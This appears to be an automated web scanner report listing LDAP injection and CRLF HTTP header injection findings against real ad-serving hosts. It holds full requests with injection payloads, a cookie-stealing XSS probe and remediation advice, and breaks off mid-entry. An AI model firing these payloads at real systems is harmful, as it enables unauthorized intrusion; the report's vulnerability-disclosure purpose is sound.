If possible, applications should avoid copying user-controllable data into LDAP queries. If this is unavoidable, then the data should be strictly validated to prevent LDAP injection attacks. In most situations, it will be appropriate to allow only short alphanumeric strings to be copied into queries, and any other input should be rejected. At a minimum, input containing any LDAP metacharacters should be rejected; characters that should be blocked include ( ) ; , * | & = and whitespace.
The size parameter appears to be vulnerable to LDAP injection attacks.
The payloads *)(sn=* and *)!(sn=* were each submitted in the size parameter. These two requests resulted in different responses, indicating that the input may be being incorporated into a conjunctive LDAP query in an unsafe manner.
Request 1
GET /j.ad?site=nydailynewscom&adSpace=ros&tagKey=1282868635&th=24526296851&tKey=aVmn6ySVfC4AvEpWInUWZbPudZbi90&size=*)(sn=*&p=4068932&a=1&flashVer=10&ver=1.20¢er=1&url=http%3A%2F%2Fwww.nydailynews.com%2Fblogs70f75'%253balert(document.cookie)%2F%2F84f766b9c15%2Fjets%2F2011%2F01%2Flive-chat-friday-noon-1&rurl=http%3A%2F%2Fburp%2Fshow%2F4&f=0&rnd=4069925 HTTP/1.1 Host: a.tribalfusion.com Proxy-Connection: keep-alive Referer: http://www.nydailynews.com/blogs70f75'%3balert(document.cookie)//84f766b9c15/jets/2011/01/live-chat-friday-noon-1 Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: ANON_ID=aEn51LRZdySO6IUMsYExOjh1oBlrc7bJ8Za02ysiMOWruOZbe8aQHWTJ8WFv9mbElFFCFAwmoSrGk5x451A6bOHntMcsnInNDGLCwrScLQLMZaZb1Ncmcf7K20KbT57np199FZaw0mLWCH3AI5YJ0Wu36N55DyVPRBluxr7Bd5gBBXYkqRUe9UmE3CjxKLRFZcGvULfwumB2EKIn6QgbjSZcpCQcvO7WyZcQFe5mtDTRxdQZcIKWq8vfRhb6rjYSsPAM4QAsdVAed20A8B7YI0bHtTZatU7uo6f2JsWE7JrIZcnCEDooMfNC2sNZavfrtdRR9acdOQurFTy82SWn4nUGHFJMcjNnQ7dfKlmsY
The NSC_betivggmf-opef cookie appears to be vulnerable to LDAP injection attacks.
The payloads *)(sn=* and *)!(sn=* were each submitted in the NSC_betivggmf-opef cookie. These two requests resulted in different responses, indicating that the input may be being incorporated into a conjunctive LDAP query in an unsafe manner.
Request 1
GET /p/kl/46/799/r/12/4/8/ast0k3n/VESIfHDf6VyGxLxswN5oXZuDY9-JNctdlx3I0VSaliO7Vdbu-ffjKQ==/click.txt HTTP/1.1 Host: this.content.served.by.adshuffle.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: sid=43118469-708a-43ea-a596-af6467b86b10; v=576462396875340721; ts=1/29/2011+12:42:58+AM; av1=c0596.66bcd=0114111510:b5d53.66348=0114111516:51f37.693f3=0128111859; vcs0=vC0596:66BCD_0_0_0_2066CE_0_0|vB5D53:66348_0_0_0_2066D4_0_0|v51F37:693F3_0_0_0_20B673_0_0; vc=; z=4; NSC_betivggmf-opef=*)(sn=*;
Response 1
HTTP/1.1 302 Found Cache-Control: private, no-cache="Set-Cookie" Pragma: no-cache Content-Type: text/html; charset=utf-8 Expires: Sat, 29 Jan 2011 01:41:17 GMT Location: http://search.mylife.com/wp-wsfy/?s_cid=$208$DISd42f2251fd9347828c931695680ca7169838e357ad6d4f7ebc46eb4eb4582e5e Server: Microsoft-IIS/7.0 P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR" Set-Cookie: sid=e5eec554-859a-4200-be95-bc9bf84cd684; domain=.adshuffle.com; expires=Thu, 01-Jan-2099 06:00:00 GMT; path=/ Set-Cookie: ac1=51f37.6292a=0128111941; domain=by.adshuffle.com; expires=Thu, 01-Jan-2099 06:00:00 GMT; path=/ Set-Cookie: av1=c0596.66bcd=0114111510:b5d53.66348=0114111516:51f37.693f3=0128111859; domain=by.adshuffle.com; expires=Thu, 01-Jan-2099 06:00:00 GMT; path=/ Set-Cookie: vcs0=vC0596:66BCD_0_0_0_2066CE_0_0|vB5D53:66348_0_0_0_2066D4_0_0|v51F37:693F3_0_0_0_20B673_0_0|c51F37:6292A_0_0_0_20B69D_0_0; domain=by.adshuffle.com; expires=Thu, 01-Jan-2099 06:00:00 GMT; path=/ Date: Sat, 29 Jan 2011 01:41:17 GMT Content-Length: 229 Set-Cookie: NSC_betivggmf-opef=ffffffff0908150945525d5f4f58455e445a4a423660;expires=Sat, 29-Jan-2011 01:46:17 GMT;path=/
<html><head><title>Object moved</title></head><body> <h2>Object moved to <a href="http://search.mylife.com/wp-wsfy/?s_cid=$208$DISd42f2251fd9347828c931695680ca7169838e357ad6d4f7ebc46eb4eb4582e5e">here</a>.</h2> </body></html>
Request 2
GET /p/kl/46/799/r/12/4/8/ast0k3n/VESIfHDf6VyGxLxswN5oXZuDY9-JNctdlx3I0VSaliO7Vdbu-ffjKQ==/click.txt HTTP/1.1 Host: this.content.served.by.adshuffle.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: sid=43118469-708a-43ea-a596-af6467b86b10; v=576462396875340721; ts=1/29/2011+12:42:58+AM; av1=c0596.66bcd=0114111510:b5d53.66348=0114111516:51f37.693f3=0128111859; vcs0=vC0596:66BCD_0_0_0_2066CE_0_0|vB5D53:66348_0_0_0_2066D4_0_0|v51F37:693F3_0_0_0_20B673_0_0; vc=; z=4; NSC_betivggmf-opef=*)!(sn=*;
Response 2
HTTP/1.1 302 Found Cache-Control: private, no-cache="Set-Cookie" Pragma: no-cache Content-Type: text/html; charset=utf-8 Expires: Sat, 29 Jan 2011 01:41:17 GMT Location: http://search.mylife.com/wp-wsfy/?s_cid=$208$DISd42f2251fd9347828c931695680ca7169838e357ad6d4f7ebc46eb4eb4582e5e Server: Microsoft-IIS/7.0 P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR" Set-Cookie: ac1=51f37.6292a=0128111941; domain=by.adshuffle.com; expires=Thu, 01-Jan-2099 06:00:00 GMT; path=/ Set-Cookie: av1=c0596.66bcd=0114111510:b5d53.66348=0114111516:51f37.693f3=0128111859; domain=by.adshuffle.com; expires=Thu, 01-Jan-2099 06:00:00 GMT; path=/ Set-Cookie: vcs0=vC0596:66BCD_0_0_0_2066CE_0_0|vB5D53:66348_0_0_0_2066D4_0_0|v51F37:693F3_0_0_0_20B673_0_0|c51F37:6292A_0_0_0_20B69D_0_0; domain=by.adshuffle.com; expires=Thu, 01-Jan-2099 06:00:00 GMT; path=/ Date: Sat, 29 Jan 2011 01:41:17 GMT Content-Length: 229 Set-Cookie: NSC_betivggmf-opef=ffffffff0908150245525d5f4f58455e445a4a423660;expires=Sat, 29-Jan-2011 01:46:17 GMT;path=/
<html><head><title>Object moved</title></head><body> <h2>Object moved to <a href="http://search.mylife.com/wp-wsfy/?s_cid=$208$DISd42f2251fd9347828c931695680ca7169838e357ad6d4f7ebc46eb4eb4582e5e">here</a>.</h2> </body></html>
3. HTTP header injectionpreviousnext There are 144 instances of this issue:
HTTP header injection vulnerabilities arise when user-supplied data is copied into a response header in an unsafe way. If an attacker can inject newline characters into the header, then they can inject new HTTP headers and also, by injecting an empty line, break out of the headers into the message body and write arbitrary content into the application's response.
Various kinds of attack can be delivered via HTTP header injection vulnerabilities. Any attack that can be delivered via cross-site scripting can usually be delivered via header injection, because the attacker can construct a request which causes arbitrary JavaScript to appear within the response body. Further, it is sometimes possible to leverage header injection vulnerabilities to poison the cache of any proxy server via which users access the application. Here, an attacker sends a crafted request which results in a "split" response containing arbitrary content. If the proxy server can be manipulated to associate the injected response with another URL used within the application, then the attacker can perform a "stored" attack against this URL which will compromise other users who request that URL in future.
Issue remediation
If possible, applications should avoid copying user-controllable data into HTTP response headers. If this is unavoidable, then the data should be strictly validated to prevent header injection attacks. In most situations, it will be appropriate to allow only short alphanumeric strings to be copied into headers, and any other input should be rejected. At a minimum, input containing any characters with ASCII codes less than 0x20 should be rejected.
The value of the ;ord request parameter is copied into the Location response header. The payload 8821f%0d%0a998b2e99413 was submitted in the ;ord parameter. This caused a response containing an injected HTTP header.
Request
GET /h.click/a0mNYDpdIo56JW4sU7TGJaVcBgS6ZbyWdZbVTFJ15bErWaYmVEJdQEvJSVFZaRbunStY7Ucr54UunnWypYquM3WbFPGJZa5AJZcoWEyTtQ9Yrb61Uj70TqtRrnZbUFnXWdU2orBmRbfmYTvn5EUc4TYYnTnHYr7bUtMXyprwxq6uMx/http:/b3.mookie1.com/RealMedia/ads/click_lx.ads/TribalFusionB3/RadioShack/SELL_2011Q1/CT/728/L44/874556783/x90/USNetwork/RS_SELL_2011Q1_TF_CT_728/RadioShack_SELL_2011Q1.html/72634857383030695a694d41416f6366?;ord=8821f%0d%0a998b2e99413 HTTP/1.1 Host: a.tribalfusion.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: ANON_ID=a8nCGVw5EABCYAtRiklfg7ZdwC3yDFXRkhhrUF4qg3L3sZaUqOhZaZbriw2WPLmjhHlQa1esZad0jks9r5evcfWCKHXN6ygaUM0hM7TDZbu7CY4wy78PaZbTGPb7eIpCLDkYjrD5aptZb67wPMULu6v0W1mFnjwVDNvC6KyuZagfdstZaTfoaXyMLOAnZcYEC1NoRZdIZdCkh8ZaH4vwDhMYdiklQyrg17ZadsS3pZbJSCH2cH8BxBeWBKpgVWW299pILw1WvixDGuy5ueYZcYcnUZckKvnZaSIBnhGag5uwmFhABpnlSiMcRhCsepIj62LaXCxZaiZcDipNKhuKgsExQ16B9y31RhZbj4XxIdZa6BI4DgsPSRJqN0WkRoGaHZbIyeLiyZcs057ZcPZbZdNCM6JR1QBP6T8Ma5MC8Cjl7ZcaB3V1bUllZbZbTlswMnyRFsDUuQm4LZa5m7ZacKFDP345FH1E7sR42bZcivkJaVgpgZdZcVIRUZbA1cT5anNPmLdKsZbBi7vLvKv5nSwGuSyCLeMix0MAXVCk9yZbtfuewiRpSHJRcMYhyZd5lgYDbkcZdiMJcfFXQjZa15;
The value of REST URL parameter 10 is copied into the Location response header. The payload 81a35%0d%0a3ed9f4f3faf was submitted in the REST URL parameter 10. This caused a response containing an injected HTTP header.
Request
GET /h.click/a0mNYDpdIo56JW4sU7TGJaVcBgS6ZbyWdZbVTFJ15bErWaYmVEJdQEvJSVFZaRbunStY7Ucr54UunnWypYquM3WbFPGJZa5AJZcoWEyTtQ9Yrb61Uj70TqtRrnZbUFnXWdU2orBmRbfmYTvn5EUc4TYYnTnHYr7bUtMXyprwxq6uMx/http:/b3.mookie1.com/RealMedia/ads/click_lx.ads/TribalFusionB3/RadioShack/81a35%0d%0a3ed9f4f3faf/CT/728/L44/874556783/x90/USNetwork/RS_SELL_2011Q1_TF_CT_728/RadioShack_SELL_2011Q1.html/72634857383030695a694d41416f6366 HTTP/1.1 Host: a.tribalfusion.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: ANON_ID=a8nCGVw5EABCYAtRiklfg7ZdwC3yDFXRkhhrUF4qg3L3sZaUqOhZaZbriw2WPLmjhHlQa1esZad0jks9r5evcfWCKHXN6ygaUM0hM7TDZbu7CY4wy78PaZbTGPb7eIpCLDkYjrD5aptZb67wPMULu6v0W1mFnjwVDNvC6KyuZagfdstZaTfoaXyMLOAnZcYEC1NoRZdIZdCkh8ZaH4vwDhMYdiklQyrg17ZadsS3pZbJSCH2cH8BxBeWBKpgVWW299pILw1WvixDGuy5ueYZcYcnUZckKvnZaSIBnhGag5uwmFhABpnlSiMcRhCsepIj62LaXCxZaiZcDipNKhuKgsExQ16B9y31RhZbj4XxIdZa6BI4DgsPSRJqN0WkRoGaHZbIyeLiyZcs057ZcPZbZdNCM6JR1QBP6T8Ma5MC8Cjl7ZcaB3V1bUllZbZbTlswMnyRFsDUuQm4LZa5m7ZacKFDP345FH1E7sR42bZcivkJaVgpgZdZcVIRUZbA1cT5anNPmLdKsZbBi7vLvKv5nSwGuSyCLeMix0MAXVCk9yZbtfuewiRpSHJRcMYhyZd5lgYDbkcZdiMJcfFXQjZa15;
The value of REST URL parameter 11 is copied into the Location response header. The payload df046%0d%0ab61ace5dcb9 was submitted in the REST URL parameter 11. This caused a response containing an injected HTTP header.
Request
GET /h.click/a0mNYDpdIo56JW4sU7TGJaVcBgS6ZbyWdZbVTFJ15bErWaYmVEJdQEvJSVFZaRbunStY7Ucr54UunnWypYquM3WbFPGJZa5AJZcoWEyTtQ9Yrb61Uj70TqtRrnZbUFnXWdU2orBmRbfmYTvn5EUc4TYYnTnHYr7bUtMXyprwxq6uMx/http:/b3.mookie1.com/RealMedia/ads/click_lx.ads/TribalFusionB3/RadioShack/SELL_2011Q1/df046%0d%0ab61ace5dcb9/728/L44/874556783/x90/USNetwork/RS_SELL_2011Q1_TF_CT_728/RadioShack_SELL_2011Q1.html/72634857383030695a694d41416f6366 HTTP/1.1 Host: a.tribalfusion.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: ANON_ID=a8nCGVw5EABCYAtRiklfg7ZdwC3yDFXRkhhrUF4qg3L3sZaUqOhZaZbriw2WPLmjhHlQa1esZad0jks9r5evcfWCKHXN6ygaUM0hM7TDZbu7CY4wy78PaZbTGPb7eIpCLDkYjrD5aptZb67wPMULu6v0W1mFnjwVDNvC6KyuZagfdstZaTfoaXyMLOAnZcYEC1NoRZdIZdCkh8ZaH4vwDhMYdiklQyrg17ZadsS3pZbJSCH2cH8BxBeWBKpgVWW299pILw1WvixDGuy5ueYZcYcnUZckKvnZaSIBnhGag5uwmFhABpnlSiMcRhCsepIj62LaXCxZaiZcDipNKhuKgsExQ16B9y31RhZbj4XxIdZa6BI4DgsPSRJqN0WkRoGaHZbIyeLiyZcs057ZcPZbZdNCM6JR1QBP6T8Ma5MC8Cjl7ZcaB3V1bUllZbZbTlswMnyRFsDUuQm4LZa5m7ZacKFDP345FH1E7sR42bZcivkJaVgpgZdZcVIRUZbA1cT5anNPmLdKsZbBi7vLvKv5nSwGuSyCLeMix0MAXVCk9yZbtfuewiRpSHJRcMYhyZd5lgYDbkcZdiMJcfFXQjZa15;
The value of REST URL parameter 12 is copied into the Location response header. The payload 38ffa%0d%0a47ffac444ce was submitted in the REST URL parameter 12. This caused a response containing an injected HTTP header.
Request
GET /h.click/a0mNYDpdIo56JW4sU7TGJaVcBgS6ZbyWdZbVTFJ15bErWaYmVEJdQEvJSVFZaRbunStY7Ucr54UunnWypYquM3WbFPGJZa5AJZcoWEyTtQ9Yrb61Uj70TqtRrnZbUFnXWdU2orBmRbfmYTvn5EUc4TYYnTnHYr7bUtMXyprwxq6uMx/http:/b3.mookie1.com/RealMedia/ads/click_lx.ads/TribalFusionB3/RadioShack/SELL_2011Q1/CT/38ffa%0d%0a47ffac444ce/L44/874556783/x90/USNetwork/RS_SELL_2011Q1_TF_CT_728/RadioShack_SELL_2011Q1.html/72634857383030695a694d41416f6366 HTTP/1.1 Host: a.tribalfusion.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: ANON_ID=a8nCGVw5EABCYAtRiklfg7ZdwC3yDFXRkhhrUF4qg3L3sZaUqOhZaZbriw2WPLmjhHlQa1esZad0jks9r5evcfWCKHXN6ygaUM0hM7TDZbu7CY4wy78PaZbTGPb7eIpCLDkYjrD5aptZb67wPMULu6v0W1mFnjwVDNvC6KyuZagfdstZaTfoaXyMLOAnZcYEC1NoRZdIZdCkh8ZaH4vwDhMYdiklQyrg17ZadsS3pZbJSCH2cH8BxBeWBKpgVWW299pILw1WvixDGuy5ueYZcYcnUZckKvnZaSIBnhGag5uwmFhABpnlSiMcRhCsepIj62LaXCxZaiZcDipNKhuKgsExQ16B9y31RhZbj4XxIdZa6BI4DgsPSRJqN0WkRoGaHZbIyeLiyZcs057ZcPZbZdNCM6JR1QBP6T8Ma5MC8Cjl7ZcaB3V1bUllZbZbTlswMnyRFsDUuQm4LZa5m7ZacKFDP345FH1E7sR42bZcivkJaVgpgZdZcVIRUZbA1cT5anNPmLdKsZbBi7vLvKv5nSwGuSyCLeMix0MAXVCk9yZbtfuewiRpSHJRcMYhyZd5lgYDbkcZdiMJcfFXQjZa15;
The value of REST URL parameter 13 is copied into the Location response header. The payload 2a2b8%0d%0a0c1225ded6 was submitted in the REST URL parameter 13. This caused a response containing an injected HTTP header.
Request
GET /h.click/a0mNYDpdIo56JW4sU7TGJaVcBgS6ZbyWdZbVTFJ15bErWaYmVEJdQEvJSVFZaRbunStY7Ucr54UunnWypYquM3WbFPGJZa5AJZcoWEyTtQ9Yrb61Uj70TqtRrnZbUFnXWdU2orBmRbfmYTvn5EUc4TYYnTnHYr7bUtMXyprwxq6uMx/http:/b3.mookie1.com/RealMedia/ads/click_lx.ads/TribalFusionB3/RadioShack/SELL_2011Q1/CT/728/2a2b8%0d%0a0c1225ded6/874556783/x90/USNetwork/RS_SELL_2011Q1_TF_CT_728/RadioShack_SELL_2011Q1.html/72634857383030695a694d41416f6366 HTTP/1.1 Host: a.tribalfusion.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: ANON_ID=a8nCGVw5EABCYAtRiklfg7ZdwC3yDFXRkhhrUF4qg3L3sZaUqOhZaZbriw2WPLmjhHlQa1esZad0jks9r5evcfWCKHXN6ygaUM0hM7TDZbu7CY4wy78PaZbTGPb7eIpCLDkYjrD5aptZb67wPMULu6v0W1mFnjwVDNvC6KyuZagfdstZaTfoaXyMLOAnZcYEC1NoRZdIZdCkh8ZaH4vwDhMYdiklQyrg17ZadsS3pZbJSCH2cH8BxBeWBKpgVWW299pILw1WvixDGuy5ueYZcYcnUZckKvnZaSIBnhGag5uwmFhABpnlSiMcRhCsepIj62LaXCxZaiZcDipNKhuKgsExQ16B9y31RhZbj4XxIdZa6BI4DgsPSRJqN0WkRoGaHZbIyeLiyZcs057ZcPZbZdNCM6JR1QBP6T8Ma5MC8Cjl7ZcaB3V1bUllZbZbTlswMnyRFsDUuQm4LZa5m7ZacKFDP345FH1E7sR42bZcivkJaVgpgZdZcVIRUZbA1cT5anNPmLdKsZbBi7vLvKv5nSwGuSyCLeMix0MAXVCk9yZbtfuewiRpSHJRcMYhyZd5lgYDbkcZdiMJcfFXQjZa15;
The value of REST URL parameter 14 is copied into the Location response header. The payload c89af%0d%0a0d3b2c9d2c9 was submitted in the REST URL parameter 14. This caused a response containing an injected HTTP header.
Request
GET /h.click/a0mNYDpdIo56JW4sU7TGJaVcBgS6ZbyWdZbVTFJ15bErWaYmVEJdQEvJSVFZaRbunStY7Ucr54UunnWypYquM3WbFPGJZa5AJZcoWEyTtQ9Yrb61Uj70TqtRrnZbUFnXWdU2orBmRbfmYTvn5EUc4TYYnTnHYr7bUtMXyprwxq6uMx/http:/b3.mookie1.com/RealMedia/ads/click_lx.ads/TribalFusionB3/RadioShack/SELL_2011Q1/CT/728/L44/c89af%0d%0a0d3b2c9d2c9/x90/USNetwork/RS_SELL_2011Q1_TF_CT_728/RadioShack_SELL_2011Q1.html/72634857383030695a694d41416f6366 HTTP/1.1 Host: a.tribalfusion.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: ANON_ID=a8nCGVw5EABCYAtRiklfg7ZdwC3yDFXRkhhrUF4qg3L3sZaUqOhZaZbriw2WPLmjhHlQa1esZad0jks9r5evcfWCKHXN6ygaUM0hM7TDZbu7CY4wy78PaZbTGPb7eIpCLDkYjrD5aptZb67wPMULu6v0W1mFnjwVDNvC6KyuZagfdstZaTfoaXyMLOAnZcYEC1NoRZdIZdCkh8ZaH4vwDhMYdiklQyrg17ZadsS3pZbJSCH2cH8BxBeWBKpgVWW299pILw1WvixDGuy5ueYZcYcnUZckKvnZaSIBnhGag5uwmFhABpnlSiMcRhCsepIj62LaXCxZaiZcDipNKhuKgsExQ16B9y31RhZbj4XxIdZa6BI4DgsPSRJqN0WkRoGaHZbIyeLiyZcs057ZcPZbZdNCM6JR1QBP6T8Ma5MC8Cjl7ZcaB3V1bUllZbZbTlswMnyRFsDUuQm4LZa5m7ZacKFDP345FH1E7sR42bZcivkJaVgpgZdZcVIRUZbA1cT5anNPmLdKsZbBi7vLvKv5nSwGuSyCLeMix0MAXVCk9yZbtfuewiRpSHJRcMYhyZd5lgYDbkcZdiMJcfFXQjZa15;
The value of REST URL parameter 15 is copied into the Location response header. The payload 6ed4a%0d%0a7f5049d3d31 was submitted in the REST URL parameter 15. This caused a response containing an injected HTTP header.
Request
GET /h.click/a0mNYDpdIo56JW4sU7TGJaVcBgS6ZbyWdZbVTFJ15bErWaYmVEJdQEvJSVFZaRbunStY7Ucr54UunnWypYquM3WbFPGJZa5AJZcoWEyTtQ9Yrb61Uj70TqtRrnZbUFnXWdU2orBmRbfmYTvn5EUc4TYYnTnHYr7bUtMXyprwxq6uMx/http:/b3.mookie1.com/RealMedia/ads/click_lx.ads/TribalFusionB3/RadioShack/SELL_2011Q1/CT/728/L44/874556783/6ed4a%0d%0a7f5049d3d31/USNetwork/RS_SELL_2011Q1_TF_CT_728/RadioShack_SELL_2011Q1.html/72634857383030695a694d41416f6366 HTTP/1.1 Host: a.tribalfusion.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: ANON_ID=a8nCGVw5EABCYAtRiklfg7ZdwC3yDFXRkhhrUF4qg3L3sZaUqOhZaZbriw2WPLmjhHlQa1esZad0jks9r5evcfWCKHXN6ygaUM0hM7TDZbu7CY4wy78PaZbTGPb7eIpCLDkYjrD5aptZb67wPMULu6v0W1mFnjwVDNvC6KyuZagfdstZaTfoaXyMLOAnZcYEC1NoRZdIZdCkh8ZaH4vwDhMYdiklQyrg17ZadsS3pZbJSCH2cH8BxBeWBKpgVWW299pILw1WvixDGuy5ueYZcYcnUZckKvnZaSIBnhGag5uwmFhABpnlSiMcRhCsepIj62LaXCxZaiZcDipNKhuKgsExQ16B9y31RhZbj4XxIdZa6BI4DgsPSRJqN0WkRoGaHZbIyeLiyZcs057ZcPZbZdNCM6JR1QBP6T8Ma5MC8Cjl7ZcaB3V1bUllZbZbTlswMnyRFsDUuQm4LZa5m7ZacKFDP345FH1E7sR42bZcivkJaVgpgZdZcVIRUZbA1cT5anNPmLdKsZbBi7vLvKv5nSwGuSyCLeMix0MAXVCk9yZbtfuewiRpSHJRcMYhyZd5lgYDbkcZdiMJcfFXQjZa15;
The value of REST URL parameter 16 is copied into the Location response header. The payload db4cb%0d%0a91914b3fee4 was submitted in the REST URL parameter 16. This caused a response containing an injected HTTP header.
Request
GET /h.click/a0mNYDpdIo56JW4sU7TGJaVcBgS6ZbyWdZbVTFJ15bErWaYmVEJdQEvJSVFZaRbunStY7Ucr54UunnWypYquM3WbFPGJZa5AJZcoWEyTtQ9Yrb61Uj70TqtRrnZbUFnXWdU2orBmRbfmYTvn5EUc4TYYnTnHYr7bUtMXyprwxq6uMx/http:/b3.mookie1.com/RealMedia/ads/click_lx.ads/TribalFusionB3/RadioShack/SELL_2011Q1/CT/728/L44/874556783/x90/db4cb%0d%0a91914b3fee4/RS_SELL_2011Q1_TF_CT_728/RadioShack_SELL_2011Q1.html/72634857383030695a694d41416f6366 HTTP/1.1 Host: a.tribalfusion.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: ANON_ID=a8nCGVw5EABCYAtRiklfg7ZdwC3yDFXRkhhrUF4qg3L3sZaUqOhZaZbriw2WPLmjhHlQa1esZad0jks9r5evcfWCKHXN6ygaUM0hM7TDZbu7CY4wy78PaZbTGPb7eIpCLDkYjrD5aptZb67wPMULu6v0W1mFnjwVDNvC6KyuZagfdstZaTfoaXyMLOAnZcYEC1NoRZdIZdCkh8ZaH4vwDhMYdiklQyrg17ZadsS3pZbJSCH2cH8BxBeWBKpgVWW299pILw1WvixDGuy5ueYZcYcnUZckKvnZaSIBnhGag5uwmFhABpnlSiMcRhCsepIj62LaXCxZaiZcDipNKhuKgsExQ16B9y31RhZbj4XxIdZa6BI4DgsPSRJqN0WkRoGaHZbIyeLiyZcs057ZcPZbZdNCM6JR1QBP6T8Ma5MC8Cjl7ZcaB3V1bUllZbZbTlswMnyRFsDUuQm4LZa5m7ZacKFDP345FH1E7sR42bZcivkJaVgpgZdZcVIRUZbA1cT5anNPmLdKsZbBi7vLvKv5nSwGuSyCLeMix0MAXVCk9yZbtfuewiRpSHJRcMYhyZd5lgYDbkcZdiMJcfFXQjZa15;
The value of REST URL parameter 17 is copied into the Location response header. The payload 519bd%0d%0af6f1a5ca6fc was submitted in the REST URL parameter 17. This caused a response containing an injected HTTP header.
Request
GET /h.click/a0mNYDpdIo56JW4sU7TGJaVcBgS6ZbyWdZbVTFJ15bErWaYmVEJdQEvJSVFZaRbunStY7Ucr54UunnWypYquM3WbFPGJZa5AJZcoWEyTtQ9Yrb61Uj70TqtRrnZbUFnXWdU2orBmRbfmYTvn5EUc4TYYnTnHYr7bUtMXyprwxq6uMx/http:/b3.mookie1.com/RealMedia/ads/click_lx.ads/TribalFusionB3/RadioShack/SELL_2011Q1/CT/728/L44/874556783/x90/USNetwork/519bd%0d%0af6f1a5ca6fc/RadioShack_SELL_2011Q1.html/72634857383030695a694d41416f6366 HTTP/1.1 Host: a.tribalfusion.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: ANON_ID=a8nCGVw5EABCYAtRiklfg7ZdwC3yDFXRkhhrUF4qg3L3sZaUqOhZaZbriw2WPLmjhHlQa1esZad0jks9r5evcfWCKHXN6ygaUM0hM7TDZbu7CY4wy78PaZbTGPb7eIpCLDkYjrD5aptZb67wPMULu6v0W1mFnjwVDNvC6KyuZagfdstZaTfoaXyMLOAnZcYEC1NoRZdIZdCkh8ZaH4vwDhMYdiklQyrg17ZadsS3pZbJSCH2cH8BxBeWBKpgVWW299pILw1WvixDGuy5ueYZcYcnUZckKvnZaSIBnhGag5uwmFhABpnlSiMcRhCsepIj62LaXCxZaiZcDipNKhuKgsExQ16B9y31RhZbj4XxIdZa6BI4DgsPSRJqN0WkRoGaHZbIyeLiyZcs057ZcPZbZdNCM6JR1QBP6T8Ma5MC8Cjl7ZcaB3V1bUllZbZbTlswMnyRFsDUuQm4LZa5m7ZacKFDP345FH1E7sR42bZcivkJaVgpgZdZcVIRUZbA1cT5anNPmLdKsZbBi7vLvKv5nSwGuSyCLeMix0MAXVCk9yZbtfuewiRpSHJRcMYhyZd5lgYDbkcZdiMJcfFXQjZa15;
The value of REST URL parameter 18 is copied into the Location response header. The payload 8383b%0d%0afea7a730776 was submitted in the REST URL parameter 18. This caused a response containing an injected HTTP header.
Request
GET /h.click/a0mNYDpdIo56JW4sU7TGJaVcBgS6ZbyWdZbVTFJ15bErWaYmVEJdQEvJSVFZaRbunStY7Ucr54UunnWypYquM3WbFPGJZa5AJZcoWEyTtQ9Yrb61Uj70TqtRrnZbUFnXWdU2orBmRbfmYTvn5EUc4TYYnTnHYr7bUtMXyprwxq6uMx/http:/b3.mookie1.com/RealMedia/ads/click_lx.ads/TribalFusionB3/RadioShack/SELL_2011Q1/CT/728/L44/874556783/x90/USNetwork/RS_SELL_2011Q1_TF_CT_728/8383b%0d%0afea7a730776/72634857383030695a694d41416f6366 HTTP/1.1 Host: a.tribalfusion.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: ANON_ID=a8nCGVw5EABCYAtRiklfg7ZdwC3yDFXRkhhrUF4qg3L3sZaUqOhZaZbriw2WPLmjhHlQa1esZad0jks9r5evcfWCKHXN6ygaUM0hM7TDZbu7CY4wy78PaZbTGPb7eIpCLDkYjrD5aptZb67wPMULu6v0W1mFnjwVDNvC6KyuZagfdstZaTfoaXyMLOAnZcYEC1NoRZdIZdCkh8ZaH4vwDhMYdiklQyrg17ZadsS3pZbJSCH2cH8BxBeWBKpgVWW299pILw1WvixDGuy5ueYZcYcnUZckKvnZaSIBnhGag5uwmFhABpnlSiMcRhCsepIj62LaXCxZaiZcDipNKhuKgsExQ16B9y31RhZbj4XxIdZa6BI4DgsPSRJqN0WkRoGaHZbIyeLiyZcs057ZcPZbZdNCM6JR1QBP6T8Ma5MC8Cjl7ZcaB3V1bUllZbZbTlswMnyRFsDUuQm4LZa5m7ZacKFDP345FH1E7sR42bZcivkJaVgpgZdZcVIRUZbA1cT5anNPmLdKsZbBi7vLvKv5nSwGuSyCLeMix0MAXVCk9yZbtfuewiRpSHJRcMYhyZd5lgYDbkcZdiMJcfFXQjZa15;
The value of REST URL parameter 19 is copied into the Location response header. The payload a51c3%0d%0a7eebecdec02 was submitted in the REST URL parameter 19. This caused a response containing an injected HTTP header.
Request
